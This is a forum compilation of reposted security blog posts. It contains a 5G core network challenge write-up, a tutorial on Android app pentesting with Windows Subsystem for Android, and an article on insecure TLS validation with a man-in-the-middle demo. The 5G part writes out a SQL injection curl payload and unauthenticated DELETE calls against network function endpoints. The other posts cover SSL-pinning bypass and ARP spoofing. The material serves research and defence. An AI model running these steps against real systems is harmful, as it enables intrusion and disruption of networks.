    The two interfaces we focused on seemed to have an interesting exposed interface at port TCP 3000 for both hosts and a TCP 5050 interface for IP 195.148.*. as follows:

    Nmap scan report for 5GC1.research.****.aalto.fi (195.148.***.***)
    Host is up (0.044s latency).
    Not shown: 997 closed ports
    PORT     STATE    SERVICE  VERSION
    [...]
    3000/tcp open     ssl/http Node.js (Express middleware)
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: EPC USER INTERFACE
    | ssl-cert: Subject: commonName=www.localhost.com/organizationName=c****core/stateOrProvinceName=ESPOO/countryName=FI
    | Issuer: commonName=www.localhost.com/organizationName=c***core/stateOrProvinceName=ESPOO/countryName=FI
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-01-10T08:20:47
    | Not valid after:  2020-02-09T08:20:47
    | MD5:   3bea 59c5 d273 8e76 943e 5da1 ca0f 2040
    |_SHA-1: f5fc 11d5 489e b5a9 27e3 66b7 386e 05e0 5b79 78ea
    |_ssl-date: TLS randomness does not represent time
    | tls-alpn: 
    |_  http/1.1
    [...]
    Nmap scan report for rs-122.research.*****.****.fi (195.148.***.***)
    Host is up (0.044s latency).
    Not shown: 996 closed ports
    PORT     STATE    SERVICE  VERSION
    22/tcp   open     ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 a3:8f:d9:************************************** (RSA)
    |   256 19:99:4d:*************************************** (ECDSA)
    |_  256 22:99:80:*************************************** (ED25519)
    25/tcp   filtered smtp
    3000/tcp open     ssl/http Node.js (Express middleware)
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: EPC USER INTERFACE
    | ssl-cert: Subject: commonName=www.localhost.com/organizationName=c****core/stateOrProvinceName=ESPOO/countryName=FI
    | Issuer: commonName=www.localhost.com/organizationName=c***core/stateOrProvinceName=ESPOO/countryName=FI
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-01-10T08:20:47
    | Not valid after:  2020-02-09T08:20:47
    | MD5:   3bea 59c5 d273 8e76 943e 5da1 ca0f 2040
    |_SHA-1: f5fc 11d5 489e b5a9 27e3 66b7 386e 05e0 5b79 78ea
    |_ssl-date: TLS randomness does not represent time
    | tls-alpn: 
    |_  http/1.1
    | tls-nextprotoneg: 
    |   http/1.1
    |_  http/1.0
    5050/tcp open     mmcc?
    | fingerprint-strings: 
    |   FourOhFourRequest: 
    |     HTTP/1.0 404 NOT FOUND
    |     Connection: close
    |     Content-Length: 232
    |     Content-Type: text/html; charset=utf-8
    |     Date: Mon, 14 Jun 2021 15:18:55 GMT
    |     Server: waitress
    |     <!DOCTYP#fig:c****core1#fig:c****core1E HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    |     <title>404 Not Found</title>
    |     <h1>Not Found</h1>
    |     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    |   GetRequest: 
    |     HTTP/1.0 200 OK
    |     Connection: close
    |     Content-Length: 2407
    |     Content-Type: text/html; charset=utf-8
    [...]
    
    Heterodyne process
    Core network Management console exposed on TCP port 3000
    Heterodyne process
    Management interface exposed on TCP port 5050 on 195.148.***.***

    Finding these interfaces, our team proceeded by hunting for vulnerabilities on web applications.

     

    Web vulnerabilities in core's GUI

    Traversal

    By bruteforcing directories in exposed web interfaces, it was found that at least one was vulnerable to a path traversal, giving us access to the Core Network Management Interface as follows:

    Heterodyne process
    Directory traversal in Core Network's console

    With such access, we could directly look for secret likes preshared key Ki used to derive session keys for each subscriber:

    Heterodyne process
    Secret exposed in the exploited interface

    In that context, keys were just duplicated for the challenge, as it is more convenient to develop a batch of ISIM cards with the exact same key. But imagine if those keys were actually used in real-world context, an attacker would be able to use these secrets and trap the victims in fake gNB, as the BTS, or (e/g)NodeB would be able to authenticate itself with that key. Indeed, if we are considering using an srsRAN for 4G and 5G NSA, or an Amarisoft gNB and provide the key of each user the following way, we will be able to spy on communications being close to targets.

    Following this traversal vulnerability, we have also found another web vulnerability that allowed us to gain more information.

    Leaked password

    Continuing our investigation, we have been able to retrieve accesses to the MySQL database:

    Heterodyne process
    Leaked password in the core network web console

    Unfortunately for us, this database was not directly exposed.

    SQL injection

    Indeed, by inspecting the JavaScript file routes/routes.js of the web user interface, it was shown that some parameterized SQL query were used for most functions. However, among all options, the /operator endpoint was clearly an option:

    check('mcc').isInt({ min: 100, max: 999 }).withMessage('Error! mcc should be integer value!').trim().escape(),
    check('mnc').isLength({ min: 1, max: 3 }).withMessage('Error! Mnc should not be empty !').trim().escape(),
    check('op').isHexadecimal().withMessage('Error! The op field requires hexadecimal value!').trim().escape(),
    check('amf').isHexadecimal().withMessage('Error! The amf field requires hexadecimal value!').trim().escape(),
    check('name').isLength({ min: 1 }).withMessage('Error! The name field requires alphanumeric characters!').trim()
    ... snipped ...
    mysql_op = "INSERT INTO operators (mcc,mnc,op,amf,name) values ('" + req.body.mcc + "','" + req.body.mnc + "',UNHEX('" + req.body.op + "'),UNHEX('" + req.body.amf + "'),'" + req.body.name + "')";
    db.query(mysql_op, function (err, op_data) {
    

    Testing this option, we could observe that it was possible to save a result into an inserted column using the following query:

    $ curl -L -k  'https://195.148.****:3000/operator' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
    ' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Referer: https://195.148.******:3000/display_operator' -H 'DNT: 1' -H 'Connection: keep-alive
    ' -H 'Cookie: connect.sid=s%3A77zZAllwXzI3OMKe6gK5b1iy***********************************************************'  -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: https://19
    5.*******:3000' --data-raw 'mcc=901&mnc=01&op=f964ba947*********************&amf=8000&name=a%27%29%3B%20SELECT%20COUNT%28%2A%29%20INTO%20%40v1%20FROM%20five_g_service_data%3B%20UPDAT
    E%20operators%20SET%20operators.name%20%3D%20LEFT%28%40v1%2C%2020%29%20WHERE%20operators.mcc%20%3D%20%27901%27%20%23%20'
    

    The query resulted as follows:

    Heterodyne process
    SQL injection in the core network management interface

    However, it was also observed that we were limited to 20 characters maximum with the name field which was the bigger type in this case. We could retrieve the result in blind using timing functions, but it was in fact time-consuming. So the best option was to automate it, but also keep a clean page for other participants by saving results discreetly in the name field as possible.

    Running on time, our black-box approach needed to finish and we used SSH tunnels provided by organizers to continue inside the "Operator's Network".

     

    Interaction with NRF

    Inside the Operator's network, we were able to scan and discover a few other systems and particularly some HTTPS endpoints that were revealed to be an NRF (Network Function Repository Function) endpoints:

    $ curl -k -X GET "https://10.33.*****:9090/bootstrapping" -H "accept: application/3gppHal+json"
    {"status":"OPERATIVE","_links":{"authorize":{"href":"https://10.33.******:9090/oauth2/token"},"discover":{"href":"https://10.33.******:9090/nnrf-disc/v1/nf-instances"},"manage":{"href":"https://10.33.******:9090/v1/nf-instances"},"self":{"href":"https://10.33.1.12:9090/bootstrapping"},"subscribe":{"href":"https://10.33.1.12:9090/nnrf-nfm/v1/subscriptions"}}}
    

    While this method returns API endpoints for different kindis of tasks. After that, we can inspect further this API, like using the nf-instances endpoints by example:

    $ curl -k -X GET "https://10.33.*****:9090/nnrf-disc/v1/nf-instances?target-nf-type=NRF&requester-nf-type=NRF"
    {"validityPeriod":120,"nfInstances":[{"nfInstanceId":"8cfcf12f-c78f-******************","nfType":"NRF","nfStatus":"REGISTERED","nfInstanceName":"nrf-cumu","plmnList":[{"mcc":"244","mnc":"53"}],"ipv4Addresses":["10.33.*******:9090"],"allowedPlmns":[{"mcc":"244","mnc":"53"}],"allowedNfTypes":["NWDAF","SMF","NRF","UDM","AMF","AUSF","NEF","PCF","SMSF","NSSF","UDR","LMF","GMLC","5G_EIR","SEPP","UPF","N3IWF","AF","UDSF","BSF","CHF","PCSCF","CBCF","HSS","SORAF","SPAF","MME","SCSAS","SCEF","SCP"],"nfServiceList":{"0":{"serviceInstanceId":"0","serviceName":"nnrf-disc","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"https","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.1.12","ipv6Address":"","transport":"TCP","port":9090}],"allowedPlmns":[{"mcc":"244","mnc":"53"}]},"1":{"serviceInstanceId":"1","serviceName":"nnrf-nfm","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"https","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.****","ipv6Address":"","transport":"TCP","port":9090}],"allowedPlmns":[{"mcc":"244","mnc":"53"}]}}}]}
    

    It should be noted that all these queries were performed without any authentication. Nevertheless, a good understanding of the 3GPP OpenAPI is required if we do not want to drown down looking at all the YAML files. Luckily for us at that time, there was some project like 5GC APIs which allowed us to save plenty of time.

    Heterodyne process
    OpenAPI Descriptions of 3GPP 5G APIs (Release 17)

    A project like 5GC API allows us to quickly construct queries, but these queries needed them to be converted to Burp Suite if we wanted to automate some work, but also record behaviours more narrowly.

    So after the challenge, a Burp Suite extension was also released by Penthertz to allow future telecom pentesters to directly check the NRF interface. This extension is officially available in Burp's store.

    Heterodyne process
    Parsed OpenAPI YAML in Burp Suite

    And by playing with the different endpoints, we have been able to reach the goal of the challenge by interrupting the traffic by deleting the NF instances created for the challenge:

    $ curl -k -X DELETE "https://10.33.*****:9090/nnrf-nfm/v1/nf-instances/84694f7d-7f76-44af************************" -H  "accept: */*" # first API call
    $ curl -k -X DELETE "https://10.33.*****:9090/nnrf-nfm/v1/nf-instances/84694f7d-7f76-44a*****************" -H  "accept: */*" # second API call
    {"title":"Data not found","status":404,"cause":"DATA_NOT_FOUND"}
    

    But abusing the PUT web verb, we were also able to perform a lot of alterations and hijack clients, or also create are own instances for the purpose:

    Heterodyne process
    Result of a fake instance create in the NRF

    The risks of having an NRF interface exposed to an attacker, and without authentication can have terrible consequence as each function is responsible for a task, and hijacking these functions would allow an attacker to be persistent and steal secrets, monitor communications, and pivot to sensitive slices easily to gain access to other infrastructures.

    For more information regarding possible attacks with the NRF, but also the PFCP protocol, Positive Technologies also released a nice report resuming attacks that can be possible in 5G SA cores.

     

    Go further on leaked binaries

    During the intrusion, we have also been able to leak the binaries, but looking at these directly showed that reversing will not be very easy:

    $ file *
    amf:             ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=08f94b071650da3554e5b95f70e6ba3850ce6318, with debug_info, not stripped
    amf_config.json: ASCII text
    cert:            directory
    config.yml:      ASCII text
    go-upf:          ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=ckq7fZLxgmR6uenXU4JZ/KAXEUT7OwQ1xBaGVgD_7/ooHH5veYSKyfB5KX-Pjl/gKzOtxFRdL-lJs_6ac2l, stripped
    hackathon_tckn:  data
    nrf:             ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=uX08ekosFePKbnLnF0QB/JUYvVUCmbTHKFc0ERXZw/ZsdPpGDbVPLe-CI-lzfU/KT8XrjYx8vFbsGgXj9wS, not stripped
    nrf-config.yml:  ASCII text
    private.key:     PEM RSA private key
    public.crt:      PEM certificate
    pub.pem:         ASCII text
    smf:             ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=00c4f4b9e2b8c364e8d6598336d1003324ed76c9, with debug_info, not stripped
    smf_config.json: JSON data
    

    Indeed, interesting binaries seem to be written in Go language.

    Apart from looking at string references, we did not have the time to go further on the binary, but it would be interesting to look at these at least using a network fuzzer.

    To also assist on reversing those binaries, a Ghidra plugin is available for x86_64 architectures:

    Heterodyne process
    Ghidra Go Tools Plugin within `SearchNFInstances` decompiled function

    Even if the analysis would be painful, the plugin helps a lot retrieving function names, arguments in calls, and return types, which is also good for fuzzing purposes. We will probably cover it in another blog post.

     

    Conclusion

    5G-NR SA is expected soon to be released to the public, and we saw that a new network protocol in HTTP/2 will be used for this purpose. As a fact, it means that a new form of attack will also be introduced in the telecom industry, that was for the moment only mostly dealing with network attacks in the core, but will also have to be aware of potential web vulnerabilities in the future. We showed thanks to the 5G Cybersecurity event, that even 5G-NR SA core network can be exposed and easily attacked depending on exposed services, and the implementation of services and web applications. Indeed, the NRF interface was not directly exposed in our cases, and it would be a long road to get access to this interface with the vulnerable core network interface exposed.

    Penthertz offers

    Trainings

    Starting 2022, Penthertz will offer 5G-NR and 5GNC security training at Advanced Security Training as 5G Mobile Device Hacking.

    This training will be an opportunity to attendees to touch a 5G-NR NSA and SA testbed in remote, but also an opportunity to play with a 5G Core Network.

    For more information: click here

    Consulting

    Penthertz has more than 10 years experience in radio including mobile security since 2010, and provides consultancy services to find weak points in radio communications and network. To get more information, please contact us using this link.

     

    Sursa: https://penthertz.com/blog/Intruding-5G-core-networks-from-outside-and_inside.html

  9. Android Application Testing Using Windows 11 and Windows Subsystem for Android

    Reading time ~17 min
    Posted by Michael Higgo on 16 November 2021

    With the release of windows 11, Microsoft announced the Windows Subsystem for Android or WSA. This following their previous release, Windows Subsystem for Linux or WSL. These enable you to run a virtual Linux or Android environment directly on your Windows Operating System, without the prerequisite compatibility layer provided by third-party software. In this post I’ll show you how to use WSA for Android mobile application pentesting, such that you can perform all of the usual steps using only Windows, with no physical Android device or emulator needed.

    Experience

    The WSA experience is great; when installing applications within WSA, they are automatically available to the Windows host. Likewise, all files and resources from the Windows host can interact with the Android Subsystem. In the past, Android emulation has been notoriously tricky. Third party applications always required you to place your trust somewhere else, and have always been slow and resource heavy.

    This got me thinking about how WSA could potentially be used for Android security testing, without the need for an Android device. In order for this to be successful, I would need to be able to install, patch, and run Android applications, as well as intercept traffic… in same manner as on a physical Android device. This would serve two purposes – the first being removing the need for a potentially expensive device, and secondly creating a uniform and reproducible testing platform.

    Step 1 – Prerequisite Applications

    The following applications are often needed to conduct Android application security testing. Not all of them are not necessary for WSA itself, but are useful for Android testing and connectivity in general.

    • Android Studio is a must for any Android testing. It provides a debugger, and a way to view the components of an APK in an easily digestible format.
    • We will be using Objection to patch APKs prior to installation as well as to perform some instrumentation of the target application. Objection has various prerequisites which are mentioned in the Wiki and should be installed as well.
    • Windows 11 – with the virtual machine platform enabled in the Windows Features settings.
    • Lastly, we’ll be needing Python to run objection.

    On my system, I added the paths to all of the above-mentioned tools to my Windows environment variables so that they can be run from any directory. I recommend this for a smoother experience. It can be done by clicking Start, and then typing environmental variables, and editing the system-wide variables.

    Env_variables-1-1024x445.png Adding all the previously installed tools to your PATH environmental variable

    Step 2 – Installation

    Microsoft has detailed instructions on how to install “base” WSA here.

    At the time of writing this post, in order to install WSA directly from the Microsoft Store, you need to be part of the Windows Insider Program, and running on the Beta channel. This will change in future releases. It is also currently only possible to install a small subset of applications from the Amazon Appstore, which is installed from the Microsoft Store here – it’s just stores all the way down!

    These limitations don’t help us when a client sends an APK or AAB bundle, so we need a way to side load applications, the same as we would on a regular physical device. Thankfully this is made possible following my second installation method below.

    Installation method 1 – Limited WSA

For demonstration purposes, let's first see how to install Microsoft's limited WSA distributed through the Insider Program. We won't modify it to allow Google Play Services to work or to sideload applications; that's done in the next section, and you'll have to uninstall this version first. So this is really just to show the difference. The MSIXBundle file that you would get by signing up for the Insider Program can be discovered using this service, a link aggregator for downloading directly from the Microsoft Store. Credits to RG-Adguard for this.

    Within the URL field, enter the following (which is the URL for the Amazon Appstore):

    https://www.microsoft.com/store/productId/9P3395VX91NR

    Then select the SLOW channel and hit search. This should reveal the URL to download the WSA application directly from Microsoft.

    Download_msix-1.png Make sure to select the SLOW channel
    Download_msix_2-1-1024x133.png Select the 1.2GB MSIXbundle file

    Once downloaded, open Windows Terminal as Administrator and run the following:

    Add-AppxPackage -Path "C:\path\to\wsa.msixbundle"

    This should then give you the Windows Subsystem for Android in your Windows start menu.

    WSA_start.png WSA Settings should now be available in your start menu.

    Once the application is open, you’ll see a couple of options. The first is choosing to have the subsystem resources available as needed, or continuously available. This is a personal preference. I chose to have them running continuously, as I have resources to spare.

The second option is not a personal preference: you MUST enable developer mode within WSA, or you will not be able to connect via the Android Debug Bridge (ADB).

    WSA_enable-1-1024x459.png Ensure Developer Mode is enabled.

    You will see that you currently have no IP assigned, and this is expected. Even though the WSA settings are open, WSA itself is not necessarily running.

    WSA_No_IP-1-1024x313.png IP Address is unavailable currently.

    In order to actually start WSA, you need to click the open icon next to the FILES option, which will present you with a very basic Android file browser GUI.

    WSA_files-1.png
    WSA_Starting.png
    WSA_Files_open.png This is the screen you’ll see once the subsystem is running, and the “device” has started.

    At this point you’ll have a basic WSA installation up and running. However, it is limited to the Amazon app store, and that is not very useful for what we want to do!

    Installation method 2 – Google Play enabled WSA with root

Let’s redo the installation step-by-step using a method which provides more functionality, such as the ability to install applications directly from Google Play within Windows, the ability to sideload applications, and the ability to root your WSA “device”.

    Firstly, if you were previously playing around with WSA, or you followed my initial method, you’re going to need to uninstall all traces of WSA from your system.

Next, open your Windows settings and enable Developer Mode within Windows itself, as opposed to within WSA (although both are needed). This will allow you to install third-party application bundles from outside of the Microsoft Store.

    Developer_Settings-2.png

Next you’ll need to create and download a patched WSA installer and platform tools. This can be done by following the description on the GitHub repo here. In essence, you will fork the repo and specify the OpenGApps variant you want by name. A small selection of the variant descriptions is below:

    • Pico: This package is designed for users who want the absolute minimum GApps installation available.
    • Nano: This package is designed for users who want the smallest Google footprint possible while still enjoying native “Okay Google” and Google Search support.
    • Stock: This package includes all the Google Apps that come standard on Pixel smartphones.
fork.png The forked repo on my GitHub

    Once forked, click Actions, and click on the Build WSA workflow, specifying the OpenGApps version you selected from above. In summary, the workflow will:

    • Download WSA from the Microsoft Store (via RG-Adguard)
    • Download Magisk from the Canary branch on the Magisk repo
    • Download your specified version of OpenGApps
    • Unzip the OpenGApps
    • Mount all images
    • Integrate OpenGApps
    • Unmount all images
    • Shrink the resultant image
    • Integrate ADB
    • Package everything into the final zip file.

    You can see this workflow in action in this file.

    Build-1024x514.png Select the GApps version in the build options on the right hand side
    Build-complete.png The WSA Build is complete
    WSA_gapps.png The resultant file size will vary greatly based on the selection of GApps

You will see a download link included for a specific version of Magisk in the build options, which currently works 100% with WSA. Magisk is an application used to root Android devices. Rooting is NOT necessary for patching or interception to work, but it does provide extra functionality which may be useful to you.

    Extract the resultant WSA-with-magisk-GApps.zip contents and open a Terminal window as Admin within the unzipped directory. Then run:

    Add-AppxPackage -Register .\AppManifest.xml
    Install_new-1-1024x179.png

You can now re-open Windows Subsystem for Android from the Windows Start menu. You'll need to enable Developer Mode from within the WSA settings and click on the open files button, just as before.

Back in the terminal, we can now run ADB (either directly from the platform-tools directory, or from any directory if you modified your environment variables). Typing adb devices will give a list of all the currently available devices, which will initially be empty. We'll fix that in a moment.

    ADB_devices.png

    Looking at the WSA settings, an IP address should now be configured.

    IP_address-1.png

We can connect to this “device” using adb connect <IP>. We can then re-list the devices and confirm we have connectivity.

    ADB_de-1.png

Installing applications is as simple as adb install 'APK name'. We will be installing Magisk in this manner with adb install magisk.apk. Once installed, click on Start and search for Magisk. As WSA shares resources with Windows, Magisk can be opened from the Start menu as if it were installed in Windows directly; however, it is running seamlessly under WSA.

    Magisk_windows.png
    Magisk_settings.png

In the terminal, type adb shell to gain access to the WSA “device”. We can confirm the current user with whoami.

    ADB_shell.png

    Typing su to become root will result in a pop-up within Magisk, asking to allow root access. Once allowed, the SuperUser tab within Magisk will show that we have granted root access within the ADB shell.

    ADB_SuperUser-1.png

    We can confirm we have rooted the device with whoami.

    ADB_SU-1.png

    From this point, we have full read/write access to the WSA filesystem.

    Step 3 – Objection

Objection works in much the same way from this point. Simply running objection patchapk -s 'sourceapk' allows Objection (via ADB) to determine the device architecture, the same way as it would for a mobile device connected over USB. I will be using the “Purposefully Insecure and Vulnerable Android Application” (PIVAA) for demonstration purposes.

    Objection_patch-1-1024x189.png Objection successfully determined the x86_64 architecture, and patched the application accordingly.

    Once patched, install the application with

    adb install .\pivaa.objection.apk

As before, it is now available directly within Windows. However, starting the application will cause it to “pause” until we use objection explore to hook into the Frida server.

    PIVAA.png
    Objection_explore-1-1024x282.png Objection successfully hooks into the Frida server

    You will see this device show up as a “Pixel 5”, which seems to be the archetype for the virtual device, and may change in future updates. It’s important to note that no USB, nor a physical Pixel 5 are involved.

    I now had a working WSA installation, a rooted device, patching with Objection, and hooking into running patched applications with Objection. The main question that I was faced with at this stage was how to do the final step – intercepting traffic with Burp Suite.

    Step 4 – Intercept with Burpsuite

    As I had no way of seeing the virtual network settings or installing a certificate authority on the device, I decided to try installing an Android Launcher. A launcher is similar to a desktop environment on a Linux distribution, and is what you see when you unlock your physical android device. Some popular ones include Niagara, Nova, Lawnchair, and Stock launchers from the likes of Google and Samsung.

After trying multiple launchers, third-party settings applications, and Windows-specific proxy applications, I had the idea that the launcher with the highest probability of being compatible was the Microsoft Launcher. You can install it directly onto the device from the official Play Store link if you included OpenGApps. I opted to sideload the APK from here (however, multiple other APK mirroring sites exist, so use your preferred one) and installed it with adb install. This gave me exactly what I was looking for: a settings application.

    Settings_microsoft_launcher-1.png Other applications can be opened from the launcher directly, as opposed to the Windows Start menu
    Settings_android-1.png

    Within the Network and Internet settings, I finally had a Virtual WiFi adapter, which I was able to set proxies for.

    Virt_Wifi.png

    When in the VirtWiFi settings, I was able to select the Advanced options to install certificates. Knowing this, I generated a certificate from Burp Suite and moved it to the “device” using:

    adb push .\burpwsa.cer /storage/emulated/0/Download

    I knew I had access to all folders after rooting with Magisk, but the Downloads folder was visible within the files application of WSA itself, so I selected this as the destination directory.

    BurpWSA.png

Installing the certificate, however, needed to be done through the settings.

    Install_Certs-1.png Click on advanced – Install certificates.
    Install_certs_2-1.png Install_burpWSA.png

    Once installed, I set my proxy listener in Burp to that of my host Ethernet IP, and a port of my choosing as per usual.

    Burp_proxy-1.png

    Within the VirtWifi I edited the proxy to have the same settings.

    Virt_proxy-1.png Click the pencil on the top right to edit the config.
    Virt_proxy3-1.png Match the proxy settings to Burp Suite

Now, running the PIVAA application and hooking into it with Objection as before, but this time specifying Android SSLPinning Disable as the startup command, I was able to intercept the traffic from WSA.

    android_ssl_disable-1-1024x436.png An exception was thrown for TrustManager, indicating the SSLpinning was being bypassed
    Intercept4-1.png Specifying Sensepost.com within the application.
    intercept2-1024x677.png

    Summary

We can see that using the initial method, we're severely limited in what we can do, but there are always workarounds and more we can do!

    Digging a bit deeper, we’re able to install WSA without using the Microsoft store, and without being on the Windows 11 Beta program, but that wasn’t quite where we needed to be.

    Taking it one step further allows us to install any application we want, and obtain root privileges on WSA itself, which is a critical step in terms of security testing Android.

The final step from here, which undoubtedly took the longest, was figuring out how to intercept traffic from this virtual device in Burp Suite, in order to perform dynamic testing and modify data in transit. With this done, there is no longer a need for a physical Android device to perform security testing on Android applications.

    Please feel free to reach out to me with any questions you may have. This is still a new and evolving technology, and I hope to add to this as new methods emerge.

     

    Sursa: https://sensepost.com/blog/2021/android-application-testing-using-windows-11-and-windows-subsystem-for-android/

  10. Insecure TLS Certificate Checking in Android Apps

     
    Written by: Samuel Hopstock - Software Engineer

    Since launching Guardsquare’s mobile application security testing tool AppSweep at the beginning of August, we have been monitoring the types of security issues found in Android apps. One of the predominant issue classes we saw were apps containing code that led to an insecure configuration of HTTPS connections.

    This post will explain the technical background of why these configurations are insecure, and how attackers can take advantage of these situations. If you would like to learn more about how to properly secure HTTPS connections in Android apps, keep an eye out for the follow up post.

    HTTPS-Related Findings in AppSweep

    With HTTPS communication, the actual traffic is encrypted with the Transport Layer Security (TLS) protocol, which bases its trust model on the certificate presented by the web server. In order for the connection to be secure, the client needs to properly examine this server certificate and determine whether it is trustworthy.

    After several months of Android application scans, we’ve noticed several common issues with certificate verification in more than 33% of all scanned builds:

    1. We discovered that 9% of all builds submitted to AppSweep instructed WebView objects to ignore any TLS-related errors during connection establishment. This is insecure, as TLS errors are usually caused by invalid certificates, so ignoring them ultimately undermines the entire certificate checking process.
       
    2. 25% of the apps scanned have a malfunctioning custom implementation of the X509TrustManager class. The X509TrustManager class is responsible for the validation of TLS certificate chains, so if its implementation is flawed, the entire security concept of the protocol is disabled.
       
    3. Finally, 15% of the scanned apps were configured so that the general authenticity of the certificate was verified, but the last step of verifying the validity of the certificate’s host name was skipped. With this configuration, an attacker could present a valid certificate for malicious.com, even though the user was trying to connect to google.com.

    Causes of Insecure TLS Configurations

    As our scan results indicate, developers frequently override the secure default implementations for validating TLS certificates provided by the Android framework. A very prominent concept in the field of cryptography and IT security is to rely on well-known and tested existing algorithms and libraries, and to not “roll your own” crypto. This naturally applies to validating TLS certificates correctly as well.

    This raises the question of why developers want to override the defaults anyway, and risk ending up with insecure implementations. Analyzing StackOverflow questions and publicly available blog posts gave us some insight into the reasons, which seem twofold:

    1. Some apps need to establish secure connections to servers that use certificates issued by custom certificate authorities (CAs)
    2. OWASP strongly recommends using certificate pinning to secure communication with backend servers in accordance with security best practices, but implementing this yourself is a potentially error-prone task

    We will now dive deeper into these two reasons, exploring how they might result in insecure implementations and why developers include them in their apps.

    Custom Certificate Authorities

    Many developers want to create an app that has to communicate with a backend server using a certificate issued by a custom certificate authority. Certificate authorities (CAs) are a fundamental part of the TLS certificate system: By default, browsers and operating systems only trust connections to servers whose certificates have been issued by a well-known CA. In our example case, where the certificate was issued by an unknown custom CA, the connection attempt is aborted with an exception.

    Developers often consult sites like StackOverflow when dealing with exceptions they do not know how to deal with. But these posts often get answered with workarounds that introduce security issues such as disabling the default SSL certificate checking mechanisms in part or even completely. Unfortunately, many developers use such solutions without thoroughly checking their validity, resulting in the use of vulnerable coding patterns that lead to the AppSweep findings mentioned above.

    Certificate Pinning

    Another reason why developers might resort to custom TLS configurations actually stems from the opposite desire. Malicious actors could add an attacker-controlled certificate authority to the default trust store, which can then be used to issue forged certificates for any server. You can protect your app from such a scenario by using certificate pinning. If you are interested in learning more about this technique, check out our prior blog post on SSL certificate pinning and its limitations.

    Certificate pinning is good practice from a security point of view, but unfortunately many developers try to implement this pinning code themselves. This is a potentially error-prone task, resulting in modifications to the default certificate checking implementation that might ultimately make the result less secure than before.
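The core of a pin check is small: hash the certificate's encoded public key (its SubjectPublicKeyInfo) and compare it against a value shipped inside the app. The sketch below shows just that comparison, in plain Java rather than Android-specific code; the class and method names are illustrative, the "sha256/<base64>" pin format follows the common OkHttp/HPKP convention, and a real app should prefer Android's Network Security Configuration or a vetted library over a hand-rolled version.

```java
import java.security.MessageDigest;
import java.security.cert.X509Certificate;
import java.util.Base64;

// Illustrative sketch of the core comparison behind SPKI pinning.
public class PinCheck {
    // Compute the pin for an encoded SubjectPublicKeyInfo.
    static String spkiPin(byte[] encodedPublicKey) throws Exception {
        byte[] digest = MessageDigest.getInstance("SHA-256").digest(encodedPublicKey);
        return "sha256/" + Base64.getEncoder().encodeToString(digest);
    }

    // True if the certificate's public key matches the pin baked into the app.
    static boolean matchesPin(X509Certificate cert, String expectedPin) throws Exception {
        return spkiPin(cert.getPublicKey().getEncoded()).equals(expectedPin);
    }
}
```

A correct implementation runs this check in addition to the default chain validation, never instead of it; skipping the chain check while pinning is exactly the kind of subtle mistake the article describes.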

    Demonstrating the Risk of Broken TLS Handling

We now know about three frequently occurring types of incorrect TLS handling in Android applications, and we understand the developers' motivation for custom implementations. But we still haven't discussed the actual risk that such a broken implementation introduces for the end user and the developer.

    To dive deeper into this, we’ve constructed a containerized demo environment enabling us to easily mimic the different scenarios and demonstrate their consequences in practice. On our GitHub repository, you can find all the files you need to execute the demos, for a hands-on experience while following the next sections.

    In the next two sections, we’ll briefly describe our demo setup, after which we will use it to demonstrate three real life scenarios.

    Demo Environment Setup

    Our environment has 3 containers as shown in Figure 1, mimicking the client (mobile app), back-end & malicious entity.

    • The first container in the setup is a web server that offers an HTML web page when clients connect to it. This data that is transferred to the user is considered sensitive, and thus offered via HTTPS. The catch is that it uses a certificate issued by a custom certificate authority, mimicking the scenario we’ve observed in the previously mentioned application scans.
    • The second container contains an Android emulator running a sample app that wants to retrieve the data offered by the web server and display it in a WebView. In order to establish a connection despite the custom server certificate, it showcases different custom certificate handling implementations in each tab.
    • The third container simulates a malicious actor that happens to be on the same network as the Android device. This situation may arise e.g. in public WiFi hotspots that can frequently be found in cafes and other public places.

    1__GRAPHICS_Accepting-custom-TLS-certificates-in-AndroidFigure 1: Demo environment setup

    Intercepting HTTPS Traffic

    The final part of the setup is actually having the malicious container intercept the secure channel between the client and the server, and optionally modifying its content. To achieve this we’ll use two techniques sequentially:

    • ARP Spoofing: This makes the Android emulator believe that the malicious container is in fact the web server and analogously tells the web server that it is the Android emulator. By doing so, all network packets that are to be exchanged between the two other containers are delivered to the malicious container instead.

    2a__GRAPHICS_Accepting-custom-TLS-certificates-in-AndroidFigure 2: ARP spoofing

    • Proxying: Once the packets are being re-routed, the attacker becomes a man-in-the-middle (MITM) entity that takes care of forwarding the packets to the correct recipient. This way, they have full control over the communication without either of the other two parties noticing the presence of a proxy.

    2b__GRAPHICS_Accepting-custom-TLS-certificates-in-AndroidFigure 3: Attacker acting like a proxy

    The following three experiments showcase how this situation will look in practice, each showing a different one of the previously mentioned vulnerable HTTPS configurations in Android apps.

    WebView Ignores All SSL Errors

